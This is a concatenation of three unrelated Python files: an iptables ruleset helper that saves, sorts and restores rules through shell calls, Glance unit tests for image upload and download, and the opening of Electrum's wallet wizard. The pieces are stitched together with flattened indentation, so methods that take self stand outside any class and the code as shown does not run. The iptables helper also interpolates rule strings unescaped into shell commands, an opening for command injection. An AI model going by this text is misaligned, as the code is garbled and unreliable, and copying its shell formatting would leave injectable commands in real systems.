    doomed = [chain.name for chain in table.children
              if chain.name not in builtin and is_cleanup(chain, data)]
    for name in doomed:
        table.delete_child_by_name(name)
def _to_iptables_string(self, marshall_func=None, sort_nat_func=None, sort_filter_func=None, sort_mangle_func=None):
    """Render the tree into iptables-restore format.

    Empty chains are pruned first; optional cmp-style sort functions
    order the user chains of each table; REJECT rules are pushed to the
    end of every filter chain; marshall_func may post-process the text.
    """
    self._cleanup_empty_chain()
    if sort_filter_func:
        self._sort_chain_in_filter_table(sort_filter_func)
    if sort_mangle_func:
        self._sort_chain_in_mangle_table(sort_mangle_func)
    if sort_nat_func:
        self._sort_chain_in_nat_table(sort_nat_func)

    def make_reject_rule_last(r1, r2):
        if self.is_target_in_rule(r1, 'REJECT'):
            return 1
        if self.is_target_in_rule(r2, 'REJECT'):
            return -1
        return 0

    # Bug fix: guard against a ruleset that has no filter table; the
    # old code dereferenced self._filter_table unconditionally and
    # raised AttributeError when it was None.
    if self._filter_table is not None:
        for c in self._filter_table.children:
            c.children = sorted(c.children, make_reject_rule_last)
    content = str(self)
    if marshall_func:
        content = marshall_func(content)
    return content
def iptable_restore(self, marshall_func=None, sort_nat_func=None, sort_filter_func=None, sort_mangle_func=None):
    """Serialize the tree and apply it via /sbin/iptables-restore.

    Raises IPTablesError (carrying the shell error and the full
    ruleset) on failure; the temporary rules file is always removed.
    """
    content = self._to_iptables_string(marshall_func, sort_nat_func, sort_filter_func, sort_mangle_func)
    f = linux.write_to_temp_file(content)
    try:
        shell.call('/sbin/iptables-restore < %s' % f)
    except Exception as e:
        err ='''Failed to apply iptables rules:
shell error description:
%s
iptable rules:
%s
''' % (str(e), content)
        raise IPTablesError(err)
    finally:
        os.remove(f)
@staticmethod
def from_iptables_save():
    """Parse the live ruleset into a fresh IPTables instance."""
    instance = IPTables()
    instance.iptables_save()
    return instance

def _normalize_rule(self, rule):
    """Collapse every run of whitespace to one space for stable matching."""
    return ' '.join(rule.strip().split())
def add_rule(self, rule, table_name=FILTER_TABLE_NAME, order=0):
    """Add a '-A CHAIN ...' rule string to the given table.

    NOTE(review): only filter/nat/mangle are accepted here although the
    parser also knows the security and raw tables -- confirm whether
    that restriction is intentional before extending.
    """
    if table_name not in [self.FILTER_TABLE_NAME, self.NAT_TABLE_NAME, self.MANGLE_TABLE_NAME]:
        raise IPTablesError('unknown table name[%s]' % table_name)
    self._create_table_if_not_exists(table_name)
    chain_name = Word(printables + '-_+=%$#')
    rule_p = Word('-A') + chain_name + restOfLine
    res = rule_p.parseString(rule)
    # res[1] is the chain name parsed out of the rule text.
    self._add_rule(res[1], rule, order)

def remove_rule(self, rule_str):
    """Delete every rule whose normalized text matches rule_str."""
    rule_str = self._normalize_rule(rule_str)
    self.delete_all_by_identity(rule_str)

def search_all_rule(self, rule_str):
    """Return all rules whose normalized text matches rule_str."""
    rule_str = self._normalize_rule(rule_str)
    return self.search_all_by_identity(rule_str)

def search_rule(self, rule_str):
    """Return the first rule whose normalized text matches, or None."""
    rule_str = self._normalize_rule(rule_str)
    return self.search_by_identity(rule_str)

def delete_chain(self, chain_name, table_name=FILTER_TABLE_NAME):
    """Remove a chain (and its rules) from the given table, if present."""
    table = self.get_child_by_name(table_name)
    if not table:
        return
    table.delete_child_by_name(chain_name)
def from_iptables_save():
    """Module-level convenience wrapper for IPTables.from_iptables_save()."""
    return IPTables.from_iptables_save()

def insert_single_rule_to_filter_table(rule):
    """Insert the rule at the top of its chain unless it already exists."""
    insert_rule = rule.replace('-A', '-I')
    shell.call("/sbin/iptables-save | grep -- '{0}' > /dev/null || iptables {1}".format(rule, insert_rule))

# Ad-hoc manual test: add the same rule three times and verify the
# restore path deduplicates it (requires root and /sbin/iptables).
if __name__ == '__main__':
    ipt = IPTables.from_iptables_save()
    rule1 = '-A INPUT -i virbr0 -p udp -m udp --dport 99 -j ACCEPT'
    #rule2 = '-A xxxx -i virbr0 -p udp -m udp --dport 100 -j ACCEPT'
    #ipt.remove_rule(rule1)
    #ipt.add_rule(rule2)
    #ipt.iptable_restore()
    #ipt.delete_chain('INPUT')
    ipt.add_rule(rule1)
    ipt.add_rule(rule1)
    ipt.add_rule(rule1)
    ipt.iptable_restore()
    ipt.iptables_save()
    print ipt
|
|
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import glance_store
import mock
import six
import webob
import glance.api.policy
import glance.api.v2.image_data
from glance.common import exception
from glance.common import wsgi
from glance.tests.unit import base
import glance.tests.unit.utils as unit_test_utils
import glance.tests.utils as test_utils
class Raise(object):
    """Callable test double that raises the exception it was built with.

    Assign an instance in place of a method to make that call path fail
    with a chosen exception.
    """

    def __init__(self, exc):
        self.exc = exc

    def __call__(self, *args, **kwargs):
        # Arguments are accepted (so any call signature works) but ignored.
        raise self.exc
class FakeImage(object):
    """Minimal stand-in for a glance image domain object.

    Metadata is stored as plain attributes.  ``status`` is a property:
    when the stored status is an exception instance, assigning a new
    status raises it instead — tests use this to simulate failing
    status transitions.
    """

    def __init__(self, image_id=None, data=None, checksum=None, size=0,
                 virtual_size=0, locations=None, container_format='bear',
                 disk_format='rawr', status=None):
        self.image_id = image_id
        self.data = data
        self.checksum = checksum
        self.size = size
        self.virtual_size = virtual_size
        self.locations = locations
        self.container_format = container_format
        self.disk_format = disk_format
        self._status = status

    @property
    def status(self):
        """Current status value (or the planted exception object)."""
        return self._status

    @status.setter
    def status(self, value):
        # A planted exception fires on assignment instead of being replaced.
        if isinstance(self._status, BaseException):
            raise self._status
        self._status = value

    def get_data(self, *args, **kwargs):
        """Return the raw image data unchanged; extra args are ignored."""
        return self.data

    def set_data(self, data, size=None):
        """Join *data* chunks into ``self.data``, record *size*, and mark
        the image as touched via the status property."""
        self.data = ''.join(data)
        self.size = size
        self.status = 'modified-by-fake'
class FakeImageRepo(object):
    """Image-repository double that returns (or raises) a canned result."""

    def __init__(self, result=None):
        self.result = result

    def get(self, image_id):
        """Return the canned result; raise it when it is an exception."""
        if isinstance(self.result, BaseException):
            raise self.result
        return self.result

    def save(self, image, from_state=None):
        """Record the image handed to save() for later inspection."""
        self.saved_image = image
class FakeGateway(object):
    """Gateway double that always hands back one fixed repository."""

    def __init__(self, repo):
        self.repo = repo

    def get_repo(self, context):
        """Return the repository regardless of *context*."""
        return self.repo
class TestImagesController(base.StoreClearingUnitTest):
    """Unit tests for glance.api.v2.image_data.ImageDataController.

    The controller is wired to FakeImageRepo/FakeGateway doubles, so no
    real store or registry is involved.  Each test plants a FakeImage
    (or an exception instance) as the repo result and asserts on the
    controller's HTTP-level behaviour for download/upload.
    """

    def setUp(self):
        super(TestImagesController, self).setUp()
        self.config(verbose=True, debug=True)
        self.image_repo = FakeImageRepo()
        self.gateway = FakeGateway(self.image_repo)
        self.controller = glance.api.v2.image_data.ImageDataController(
            gateway=self.gateway)

    def test_download(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd',
                          status='active',
                          locations=[{'url': 'http://example.com/image',
                                      'metadata': {}, 'status': 'active'}])
        self.image_repo.result = image
        image = self.controller.download(request, unit_test_utils.UUID1)
        self.assertEqual('abcd', image.image_id)

    def test_download_deactivated(self):
        # Non-admins may not download a deactivated image; admins may.
        request = unit_test_utils.get_fake_request(is_admin=False)
        image = FakeImage('abcd',
                          status='deactivated',
                          locations=[{'url': 'http://example.com/image',
                                      'metadata': {}, 'status': 'active'}])
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPForbidden, self.controller.download,
                          request, str(uuid.uuid4()))
        request = unit_test_utils.get_fake_request(is_admin=True)
        image = FakeImage('abcd',
                          status='deactivated',
                          locations=[{'url': 'http://example.com/image',
                                      'metadata': {}, 'status': 'active'}])
        self.image_repo.result = image
        image = self.controller.download(request, unit_test_utils.UUID1)
        self.assertEqual('abcd', image.image_id)

    def test_download_is_not_active(self):
        # Every non-active status must be rejected with 403.
        state = ['queued', 'deleted', 'saving', 'killed', 'pending_delete']
        for st in state:
            request = unit_test_utils.get_fake_request()
            image = FakeImage('abcd',
                              status=st,
                              locations=[{'url': 'http://example.com/image',
                                          'metadata': {}, 'status': 'active'}])
            self.image_repo.result = image
            self.assertRaises(webob.exc.HTTPForbidden,
                              self.controller.download,
                              request, str(uuid.uuid4()))

    def test_download_no_location(self):
        # NOTE(mclaren): NoContent will be raised by the ResponseSerializer
        # That's tested below.
        request = unit_test_utils.get_fake_request()
        self.image_repo.result = FakeImage('abcd', status='active')
        image = self.controller.download(request, unit_test_utils.UUID2)
        self.assertEqual('abcd', image.image_id)

    def test_download_non_existent_image(self):
        request = unit_test_utils.get_fake_request()
        self.image_repo.result = exception.NotFound()
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.download,
                          request, str(uuid.uuid4()))

    def test_download_forbidden(self):
        request = unit_test_utils.get_fake_request()
        self.image_repo.result = exception.Forbidden()
        self.assertRaises(webob.exc.HTTPForbidden, self.controller.download,
                          request, str(uuid.uuid4()))

    def test_download_ok_when_get_image_location_forbidden(self):
        # Forbidden raised while merely inspecting locations must not
        # block the download itself.
        class ImageLocations(object):
            def __len__(self):
                raise exception.Forbidden()
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd', status='active')
        self.image_repo.result = image
        image.locations = ImageLocations()
        image = self.controller.download(request, unit_test_utils.UUID1)
        self.assertEqual('abcd', image.image_id)

    def test_upload(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd')
        self.image_repo.result = image
        self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
        self.assertEqual('YYYY', image.data)
        self.assertEqual(4, image.size)

    def test_upload_status(self):
        # The image must be saved in 'saving' state while data is being
        # read; the generator below observes that intermediate state.
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd')
        self.image_repo.result = image
        insurance = {'called': False}

        def read_data():
            insurance['called'] = True
            self.assertEqual('saving', self.image_repo.saved_image.status)
            yield 'YYYY'
        self.controller.upload(request, unit_test_utils.UUID2,
                               read_data(), None)
        self.assertTrue(insurance['called'])
        self.assertEqual('modified-by-fake',
                         self.image_repo.saved_image.status)

    def test_upload_no_size(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd')
        self.image_repo.result = image
        self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', None)
        self.assertEqual('YYYY', image.data)
        self.assertIsNone(image.size)

    def test_upload_invalid(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd')
        image.status = ValueError()
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.upload,
                          request, unit_test_utils.UUID1, 'YYYY', 4)

    def test_upload_with_expired_token(self):
        # Expired token during the final 'saving' save: the image must be
        # deleted and a 401 returned.
        def side_effect(image, from_state=None):
            if from_state == 'saving':
                raise exception.NotAuthenticated()
        mocked_save = mock.Mock(side_effect=side_effect)
        mocked_delete = mock.Mock()
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd')
        image.delete = mocked_delete
        self.image_repo.result = image
        self.image_repo.save = mocked_save
        self.assertRaises(webob.exc.HTTPUnauthorized, self.controller.upload,
                          request, unit_test_utils.UUID1, 'YYYY', 4)
        self.assertEqual(3, mocked_save.call_count)
        mocked_delete.assert_called_once_with()

    def test_upload_non_existent_image_during_save_initiates_deletion(self):
        def fake_save_not_found(self):
            raise exception.ImageNotFound()

        def fake_save_conflict(self):
            raise exception.Conflict()
        for fun in [fake_save_not_found, fake_save_conflict]:
            request = unit_test_utils.get_fake_request()
            image = FakeImage('abcd', locations=['http://example.com/image'])
            self.image_repo.result = image
            self.image_repo.save = fun
            image.delete = mock.Mock()
            self.assertRaises(webob.exc.HTTPGone, self.controller.upload,
                              request, str(uuid.uuid4()), 'ABC', 3)
            self.assertTrue(image.delete.called)

    def test_upload_non_existent_image_raises_image_not_found_exception(self):
        def fake_save(self):
            raise exception.ImageNotFound()

        def fake_delete():
            raise exception.ImageNotFound()
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd', locations=['http://example.com/image'])
        self.image_repo.result = image
        self.image_repo.save = fake_save
        image.delete = fake_delete
        self.assertRaises(webob.exc.HTTPGone, self.controller.upload,
                          request, str(uuid.uuid4()), 'ABC', 3)

    def test_upload_non_existent_image_raises_store_not_found_exception(self):
        def fake_save(self):
            raise glance_store.NotFound()

        def fake_delete():
            raise exception.ImageNotFound()
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd', locations=['http://example.com/image'])
        self.image_repo.result = image
        self.image_repo.save = fake_save
        image.delete = fake_delete
        self.assertRaises(webob.exc.HTTPGone, self.controller.upload,
                          request, str(uuid.uuid4()), 'ABC', 3)

    def test_upload_non_existent_image_before_save(self):
        request = unit_test_utils.get_fake_request()
        self.image_repo.result = exception.NotFound()
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.upload,
                          request, str(uuid.uuid4()), 'ABC', 3)

    def test_upload_data_exists(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage()
        exc = exception.InvalidImageStatusTransition(cur_status='active',
                                                     new_status='queued')
        image.set_data = Raise(exc)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPConflict, self.controller.upload,
                          request, unit_test_utils.UUID1, 'YYYY', 4)

    def test_upload_storage_full(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage()
        image.set_data = Raise(glance_store.StorageFull)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
                          self.controller.upload,
                          request, unit_test_utils.UUID2, 'YYYYYYY', 7)

    def test_upload_signature_verification_fails(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage()
        image.set_data = Raise(exception.SignatureVerificationError)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.upload,
                          request, unit_test_utils.UUID1, 'YYYY', 4)
        self.assertEqual('killed', self.image_repo.saved_image.status)

    def test_image_size_limit_exceeded(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage()
        image.set_data = Raise(exception.ImageSizeLimitExceeded)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
                          self.controller.upload,
                          request, unit_test_utils.UUID1, 'YYYYYYY', 7)

    def test_upload_storage_quota_full(self):
        request = unit_test_utils.get_fake_request()
        self.image_repo.result = exception.StorageQuotaFull("message")
        self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
                          self.controller.upload,
                          request, unit_test_utils.UUID1, 'YYYYYYY', 7)

    def test_upload_storage_forbidden(self):
        request = unit_test_utils.get_fake_request(user=unit_test_utils.USER2)
        image = FakeImage()
        image.set_data = Raise(exception.Forbidden)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPForbidden, self.controller.upload,
                          request, unit_test_utils.UUID2, 'YY', 2)

    def test_upload_storage_internal_error(self):
        # Internal server errors must propagate, not be converted to HTTP.
        request = unit_test_utils.get_fake_request()
        self.image_repo.result = exception.ServerError()
        self.assertRaises(exception.ServerError,
                          self.controller.upload,
                          request, unit_test_utils.UUID1, 'ABC', 3)

    def test_upload_storage_write_denied(self):
        request = unit_test_utils.get_fake_request(user=unit_test_utils.USER3)
        image = FakeImage()
        image.set_data = Raise(glance_store.StorageWriteDenied)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPServiceUnavailable,
                          self.controller.upload,
                          request, unit_test_utils.UUID2, 'YY', 2)

    def test_upload_storage_store_disabled(self):
        """Test that uploading an image file raises StoreDisabled exception"""
        request = unit_test_utils.get_fake_request(user=unit_test_utils.USER3)
        image = FakeImage()
        image.set_data = Raise(glance_store.StoreAddDisabled)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPGone,
                          self.controller.upload,
                          request, unit_test_utils.UUID2, 'YY', 2)

    @mock.patch("glance.common.trust_auth.TokenRefresher")
    def test_upload_with_trusts(self, mock_refresher):
        """Test that uploading with registry correctly uses trusts"""
        # initialize trust environment
        self.config(data_api='glance.db.registry.api')
        refresher = mock.MagicMock()
        mock_refresher.return_value = refresher
        refresher.refresh_token.return_value = "fake_token"
        # request an image upload
        request = unit_test_utils.get_fake_request()
        request.environ['keystone.token_auth'] = mock.MagicMock()
        request.environ['keystone.token_info'] = {
            'token': {
                'roles': [{'name': 'FakeRole', 'id': 'FakeID'}]
            }
        }
        image = FakeImage('abcd')
        self.image_repo.result = image
        mock_fake_save = mock.Mock()
        mock_fake_save.side_effect = [None, exception.NotAuthenticated, None]
        temp_save = FakeImageRepo.save
        # mocking save to raise NotAuthenticated on the second call
        FakeImageRepo.save = mock_fake_save
        self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
        # check image data
        self.assertEqual('YYYY', image.data)
        self.assertEqual(4, image.size)
        FakeImageRepo.save = temp_save
        # check that token has been correctly acquired and deleted
        mock_refresher.assert_called_once_with(
            request.environ['keystone.token_auth'],
            request.context.tenant, ['FakeRole'])
        refresher.refresh_token.assert_called_once_with()
        refresher.release_resources.assert_called_once_with()
        self.assertEqual("fake_token", request.context.auth_token)

    @mock.patch("glance.common.trust_auth.TokenRefresher")
    def test_upload_with_trusts_fails(self, mock_refresher):
        """Test upload with registry if trust was not successfully created"""
        # initialize trust environment
        self.config(data_api='glance.db.registry.api')
        mock_refresher().side_effect = Exception()
        # request an image upload
        request = unit_test_utils.get_fake_request()
        image = FakeImage('abcd')
        self.image_repo.result = image
        self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
        # check image data
        self.assertEqual('YYYY', image.data)
        self.assertEqual(4, image.size)
        # check that the token has not been updated
        self.assertEqual(0, mock_refresher().refresh_token.call_count)

    # NOTE: the three _test_* helpers below are disabled (leading
    # underscore keeps the runner from collecting them); they reference
    # self.notifier, which this class does not set up.
    def _test_upload_download_prepare_notification(self):
        request = unit_test_utils.get_fake_request()
        self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
        output = self.controller.download(request, unit_test_utils.UUID2)
        output_log = self.notifier.get_logs()
        prepare_payload = output['meta'].copy()
        prepare_payload['checksum'] = None
        prepare_payload['size'] = None
        prepare_payload['virtual_size'] = None
        prepare_payload['location'] = None
        prepare_payload['status'] = 'queued'
        del prepare_payload['updated_at']
        prepare_log = {
            'notification_type': "INFO",
            'event_type': "image.prepare",
            'payload': prepare_payload,
        }
        self.assertEqual(3, len(output_log))
        prepare_updated_at = output_log[0]['payload']['updated_at']
        del output_log[0]['payload']['updated_at']
        self.assertTrue(prepare_updated_at <= output['meta']['updated_at'])
        self.assertEqual(prepare_log, output_log[0])

    def _test_upload_download_upload_notification(self):
        request = unit_test_utils.get_fake_request()
        self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
        output = self.controller.download(request, unit_test_utils.UUID2)
        output_log = self.notifier.get_logs()
        upload_payload = output['meta'].copy()
        upload_log = {
            'notification_type': "INFO",
            'event_type': "image.upload",
            'payload': upload_payload,
        }
        self.assertEqual(3, len(output_log))
        self.assertEqual(upload_log, output_log[1])

    def _test_upload_download_activate_notification(self):
        request = unit_test_utils.get_fake_request()
        self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
        output = self.controller.download(request, unit_test_utils.UUID2)
        output_log = self.notifier.get_logs()
        activate_payload = output['meta'].copy()
        activate_log = {
            'notification_type': "INFO",
            'event_type': "image.activate",
            'payload': activate_payload,
        }
        self.assertEqual(3, len(output_log))
        self.assertEqual(activate_log, output_log[2])

    def test_restore_image_when_upload_failed(self):
        request = unit_test_utils.get_fake_request()
        image = FakeImage('fake')
        image.set_data = Raise(glance_store.StorageWriteDenied)
        self.image_repo.result = image
        self.assertRaises(webob.exc.HTTPServiceUnavailable,
                          self.controller.upload,
                          request, unit_test_utils.UUID2, 'ZZZ', 3)
        self.assertEqual('queued', self.image_repo.saved_image.status)
class TestImageDataDeserializer(test_utils.BaseTestCase):
    """Tests for the v2 image-data RequestDeserializer.

    Verifies the ``upload`` deserializer: extraction of the body stream
    and the ``size`` value from Content-Length, its chunked-transfer
    behaviour, and rejection of unsupported content types.
    """

    def setUp(self):
        super(TestImageDataDeserializer, self).setUp()
        self.deserializer = glance.api.v2.image_data.RequestDeserializer()

    def test_upload(self):
        request = unit_test_utils.get_fake_request()
        request.headers['Content-Type'] = 'application/octet-stream'
        request.body = b'YYY'
        request.headers['Content-Length'] = 3
        output = self.deserializer.upload(request)
        data = output.pop('data')
        self.assertEqual(b'YYY', data.read())
        expected = {'size': 3}
        self.assertEqual(expected, output)

    def test_upload_chunked(self):
        request = unit_test_utils.get_fake_request()
        request.headers['Content-Type'] = 'application/octet-stream'
        # If we use body_file, webob assumes we want to do a chunked upload,
        # ignoring the Content-Length header
        request.body_file = six.StringIO('YYY')
        output = self.deserializer.upload(request)
        data = output.pop('data')
        self.assertEqual('YYY', data.read())
        expected = {'size': None}
        self.assertEqual(expected, output)

    def test_upload_chunked_with_content_length(self):
        request = unit_test_utils.get_fake_request()
        request.headers['Content-Type'] = 'application/octet-stream'
        request.body_file = six.BytesIO(b'YYY')
        # The deserializer shouldn't care if the Content-Length is
        # set when the user is attempting to send chunked data.
        request.headers['Content-Length'] = 3
        output = self.deserializer.upload(request)
        data = output.pop('data')
        self.assertEqual(b'YYY', data.read())
        expected = {'size': 3}
        self.assertEqual(expected, output)

    def test_upload_with_incorrect_content_length(self):
        request = unit_test_utils.get_fake_request()
        request.headers['Content-Type'] = 'application/octet-stream'
        # The deserializer shouldn't care if the Content-Length and
        # actual request body length differ. That job is left up
        # to the controller
        request.body = b'YYY'
        request.headers['Content-Length'] = 4
        output = self.deserializer.upload(request)
        data = output.pop('data')
        self.assertEqual(b'YYY', data.read())
        expected = {'size': 4}
        self.assertEqual(expected, output)

    def test_upload_wrong_content_type(self):
        # Both a wrong type and a truncated octet-stream type are 415s.
        request = unit_test_utils.get_fake_request()
        request.headers['Content-Type'] = 'application/json'
        request.body = b'YYYYY'
        self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
                          self.deserializer.upload, request)
        request = unit_test_utils.get_fake_request()
        request.headers['Content-Type'] = 'application/octet-st'
        request.body = b'YYYYY'
        self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
                          self.deserializer.upload, request)
class TestImageDataSerializer(test_utils.BaseTestCase):
    """Tests for the v2 image-data ResponseSerializer.

    Covers the ``download`` serializer (body, Content-Length,
    Content-MD5, content type, and mapping of store/policy errors to
    HTTP responses) and the 204 response produced by ``upload``.
    """

    def setUp(self):
        super(TestImageDataSerializer, self).setUp()
        self.serializer = glance.api.v2.image_data.ResponseSerializer()

    def test_download(self):
        request = wsgi.Request.blank('/')
        request.environ = {}
        response = webob.Response()
        response.request = request
        image = FakeImage(size=3, data=[b'Z', b'Z', b'Z'])
        self.serializer.download(response, image)
        self.assertEqual(b'ZZZ', response.body)
        self.assertEqual('3', response.headers['Content-Length'])
        self.assertNotIn('Content-MD5', response.headers)
        self.assertEqual('application/octet-stream',
                         response.headers['Content-Type'])

    def test_download_with_checksum(self):
        request = wsgi.Request.blank('/')
        request.environ = {}
        response = webob.Response()
        response.request = request
        checksum = '0745064918b49693cca64d6b6a13d28a'
        image = FakeImage(size=3, checksum=checksum, data=[b'Z', b'Z', b'Z'])
        self.serializer.download(response, image)
        self.assertEqual(b'ZZZ', response.body)
        self.assertEqual('3', response.headers['Content-Length'])
        self.assertEqual(checksum, response.headers['Content-MD5'])
        self.assertEqual('application/octet-stream',
                         response.headers['Content-Type'])

    def test_download_forbidden(self):
        """Make sure the serializer can return 403 forbidden error instead of
        500 internal server error.
        """
        def get_data(*args, **kwargs):
            raise exception.Forbidden()
        self.stubs.Set(glance.api.policy.ImageProxy,
                       'get_data',
                       get_data)
        request = wsgi.Request.blank('/')
        request.environ = {}
        response = webob.Response()
        response.request = request
        image = FakeImage(size=3, data=iter('ZZZ'))
        image.get_data = get_data
        self.assertRaises(webob.exc.HTTPForbidden,
                          self.serializer.download,
                          response, image)

    def test_download_no_content(self):
        """Test image download returns HTTPNoContent
        Make sure that serializer returns 204 no content error in case of
        image data is not available at specified location.
        """
        with mock.patch.object(glance.api.policy.ImageProxy,
                               'get_data') as mock_get_data:
            mock_get_data.side_effect = glance_store.NotFound(image="image")
            request = wsgi.Request.blank('/')
            response = webob.Response()
            response.request = request
            image = FakeImage(size=3, data=iter('ZZZ'))
            image.get_data = mock_get_data
            self.assertRaises(webob.exc.HTTPNoContent,
                              self.serializer.download,
                              response, image)

    def test_download_service_unavailable(self):
        """Test image download returns HTTPServiceUnavailable."""
        with mock.patch.object(glance.api.policy.ImageProxy,
                               'get_data') as mock_get_data:
            mock_get_data.side_effect = glance_store.RemoteServiceUnavailable()
            request = wsgi.Request.blank('/')
            response = webob.Response()
            response.request = request
            image = FakeImage(size=3, data=iter('ZZZ'))
            image.get_data = mock_get_data
            self.assertRaises(webob.exc.HTTPServiceUnavailable,
                              self.serializer.download,
                              response, image)

    def test_download_store_get_not_support(self):
        """Test image download returns HTTPBadRequest.
        Make sure that serializer returns 400 bad request error in case of
        getting images from this store is not supported at specified location.
        """
        with mock.patch.object(glance.api.policy.ImageProxy,
                               'get_data') as mock_get_data:
            mock_get_data.side_effect = glance_store.StoreGetNotSupported()
            request = wsgi.Request.blank('/')
            response = webob.Response()
            response.request = request
            image = FakeImage(size=3, data=iter('ZZZ'))
            image.get_data = mock_get_data
            self.assertRaises(webob.exc.HTTPBadRequest,
                              self.serializer.download,
                              response, image)

    def test_download_store_random_get_not_support(self):
        """Test image download returns HTTPBadRequest.
        Make sure that serializer returns 400 bad request error in case of
        getting randomly images from this store is not supported at
        specified location.
        """
        with mock.patch.object(glance.api.policy.ImageProxy,
                               'get_data') as m_get_data:
            err = glance_store.StoreRandomGetNotSupported(offset=0,
                                                          chunk_size=0)
            m_get_data.side_effect = err
            request = wsgi.Request.blank('/')
            response = webob.Response()
            response.request = request
            image = FakeImage(size=3, data=iter('ZZZ'))
            image.get_data = m_get_data
            self.assertRaises(webob.exc.HTTPBadRequest,
                              self.serializer.download,
                              response, image)

    def test_upload(self):
        # A successful upload serializes to an empty 204 response.
        request = webob.Request.blank('/')
        request.environ = {}
        response = webob.Response()
        response.request = request
        self.serializer.upload(response, {})
        self.assertEqual(204, response.status_int)
        self.assertEqual('0', response.headers['Content-Length'])
|
|
# -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import traceback
from functools import partial
from . import bitcoin
from . import keystore
from .keystore import bip44_derivation, purpose48_derivation
from .wallet import (Imported_Wallet, Standard_Wallet, Multisig_Wallet,
wallet_types, Wallet, Abstract_Wallet)
from .storage import (WalletStorage, STO_EV_USER_PW, STO_EV_XPUB_PW,
get_derivation_used_for_hw_device_encryption)
from .i18n import _
from .util import UserCancelled, InvalidPassword, WalletFileException
from .simple_config import SimpleConfig
from .plugin import Plugins
# Hardware device setup purpose: create a new wallet from the device, or
# use the device only to decrypt an existing wallet file.
HWD_SETUP_NEW_WALLET, HWD_SETUP_DECRYPT_WALLET = range(0, 2)
# Raised when a requested script type cannot be handled.
class ScriptTypeNotSupported(Exception): pass
# Raised to signal navigating back to the previous wizard step.
class GoBack(Exception): pass
class BaseWizard(object):
def __init__(self, config: SimpleConfig, plugins: Plugins, storage: WalletStorage):
    """Initialize wizard state over *config*, *plugins* and *storage*."""
    super(BaseWizard, self).__init__()
    self.config = config
    self.plugins = plugins
    self.storage = storage
    self.wallet = None  # type: Abstract_Wallet
    self.stack = []  # history of (action, args) steps, used by go_back()
    self.plugin = None  # plugin currently driving the wizard, if any
    self.keystores = []  # keystores collected so far (one per cosigner)
    self.is_kivy = config.get('gui') == 'kivy'
    self.seed_type = None
def set_icon(self, icon):
    """No-op placeholder for displaying a wizard icon."""
    pass
def run(self, *args):
    """Execute one wizard step: ``run(action, *step_args)``.

    The step is pushed onto the stack (so go_back() can replay it),
    then dispatched: a falsy action is recorded but not dispatched; a
    (plugin, action) tuple switches the active plugin first; the action
    name is resolved on the plugin when it defines it, otherwise on
    self.  Raises for an unknown action.
    """
    action = args[0]
    args = args[1:]
    self.stack.append((action, args))
    if not action:
        return
    if type(action) is tuple:
        self.plugin, action = action
    if self.plugin and hasattr(self.plugin, action):
        # Plugin-provided actions receive the wizard as first argument.
        f = getattr(self.plugin, action)
        f(self, *args)
    elif hasattr(self, action):
        f = getattr(self, action)
        f(*args)
    else:
        raise Exception("unknown action", action)
def can_go_back(self):
